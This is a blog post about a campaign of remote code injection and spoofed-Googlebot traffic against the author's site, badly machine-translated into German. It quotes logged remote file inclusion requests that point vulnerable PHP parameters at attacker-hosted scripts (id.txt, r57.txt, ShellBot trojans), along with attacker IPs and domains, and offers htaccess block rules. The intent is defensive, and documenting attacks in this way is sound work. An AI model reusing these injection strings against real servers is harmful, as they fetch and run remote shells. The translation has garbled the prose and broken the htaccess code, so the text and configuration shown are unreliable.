Zu diesem letzten drei Tage dieses Blog leidet DOS-Angriff. Der Angriff ist noch am Leben ist jetzt Ich glaube nicht, dass sie noch nicht verlassen. I cant verboten diesem Bot direkt, wie sie waren Senden Schmiede Päckchen (Paket-Spoofing) als googlebot http://www.whois-search.com/whois/64.233.166.136. Im noch auf der Suche nach der richtigen Internet-Anbieter.
OrgName: Google Inc. OrgID: GOGL Adresse: 1600 Amphitheater Parkway Stadt: Mountain View StateProv: CA PLZ: 94043 Land: USA
Zu dem Zeitpunkt, als ich blockiert alle Remote-Streams von ihren zufälligen Host *. com und "Perl Bot Unterschrift", aber blockiert werden nicht aufhören, sie aus Hämmern dieser Website. Ich werde das Senden 503 (Service nicht verfügbar) über bestimmte Anfrage so, wenn Sie Probleme mit dem Zugriff auf diese Website wenden Sie sich bitte versuchen Sie es später erneut.
Art der Injektionen
Es gibt viel uri-Parameter in meinen Logs entdeckt (I wird deaktiviert Server-Protokolle - die Einschränkung Ressourcen) wahrscheinlich hat sie eine große Vorräte Check-Listen der bekannten CMS Schwachstellen. Ich kann nur bestätigen, dass ihr ein Blackhat-seo Spams bot, als sie Anforderungs-URI gehören die typischen order.php Seite.
/ ES / wordpress / how-to-entfernt-wordpress-net-im-Spam-Injektion-infizierten-von-mike-ja gger-goro-class-mailphp/order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / ES / wordpress / order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / order.php? wp = http://hom3.t35.com/xpl/hack/id.txt?
Um die folgenden Quelle, die Sie brauchen, um die Host-Website von Ihrem Anti-Virus-Programm.
- Perl / ShellBot.B Trojaner - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
- PHP / Rst.S Trojan - http://hom3.t35.com/xpl/fidz
htaccess blockiert schlechten Code Einspritzdüse und Perl-Bot (Botnet)
Wenn Sie hat ähnliche Probleme. Sie sollten Block bei der folgenden Domain in Ihrem htaccess.
mod_setenvifSetEnvIfNoCase Referer "^ http:// (www.)? T35 \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Jorgevolio \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Emabe \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Pawang \. In" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Gw-Gold \. Net" codeinjector_ref = 1 SetEnvIfNoCase User-Agent "^ libwww-perl *" shell_bots = 1 SetEnvIfNoCase User-Agent "^ Amidalla *" shell_bots = 1 <FilesMatch "(.*)"> Bestellen Sie erlauben, Deny Lassen Sie aus allen Deny aus env = codeinjector_ref Deny aus env = shell_bots </ FilesMatch>
wenn u Arent sicher, ob Sie Server-Unterstützung mod_setenvif wickeln sie wie die folgende Beispiel.
<IfModule Mod_setenvif.c> # ... ersetzen Sie diese Zeile mit den oben genannten Code ... </ IfModule>
Wie zum Fang Perl Shell Bot
Wir brauchen ein Muster zum Fang dieser Bots. sicherlich wussten wir, dass diese Bots geschützt:
- nicht Ehre robot.txt
- sie alle Crawl-Unterverzeichnis
- sie hat ein Muster URI-Anfrage
Für jetzt habe ich nur Unterverzeichnis für auto-Verbot (und einige andere Sachen) auf der Grundlage ihrer Muster. Alexa Bot wird auch verboten, da sie dont Ehre robot.txt.
Ich werde die Aktualisierung diesem Post von Zeit zu Zeit. Sie prüfen, die entsprechenden Artikel zu Packet Spoofing und Validierung Schmiede / Spoof-Paket.
Jüngste Scan & Update
Das folgende Liste wird automatisch hinzugefügt.
- 24. Dezember, 2007
- IP: 64.26.63.10 param: login =,? injizieren: http://pawang.in/r57.txt
- 24. Dezember, 2007
- IP: 64.26.63.10 param: = R., login = injizieren: http://pawang.in/r57.txt?
- 25. Dezember, 2007
- IP: 59.158.128.138 param: p =,: allinurl = injizieren: http://gw-gold.net/jpg/pictures/test.txt
Externe Ressourcen
- Dezember 21, 2007, 10:48 Uhr
- 16. Februar 2008 auf 3.05
- 0,3
- url
Nr. Responses to "Mass Remote Code Injection als Googlebot - Packet Spoofing Perl Bot & Trojan"
Trackback URL: Verwenden Sie die TrackBack-URL ↑ ping zu diesem Artikel. Wenn Ihr Blog unterstützt keine Trackbacks, sollten Sie vielleicht einen Kommentar hinterlassen statt.
"schreiben, als ob Sie sich unterhielten, ein guter Freund (vor Ihrer Mutter)."
. Was meinen Sie dazu?
Disclaimer: Für alle Inhalte, die Sie nach, Sie hiermit zu gewähren Kakkoi die gebührenfreie, unwiderrufliche, unbefristete, exklusive und vollständig sublizenzierbare Lizenz zu nutzen, zu reproduzieren, zu modifizieren, zu adaptieren, zu veröffentlichen, zu übersetzen, abgeleitete Arbeiten erstellen, verteilen, Durchführung und Anzeige solcher Inhalte im Ganzen oder in Teilen, weltweit und, um es in andere Werke, in jeglicher Form, Medien oder Technologie jetzt bekannt ist oder später entwickelt. Einige Rechte vorbehalten.
Die folgenden "Code" sind so konzipiert, schützen Sie und andere Nutzer dieser Website.
Um diese Erfahrungen angenehm und interessant für alle unsere Nutzer, bitten wir Sie, folgen Sie den oben genannten Richtlinien.
kann als erster Kommentar.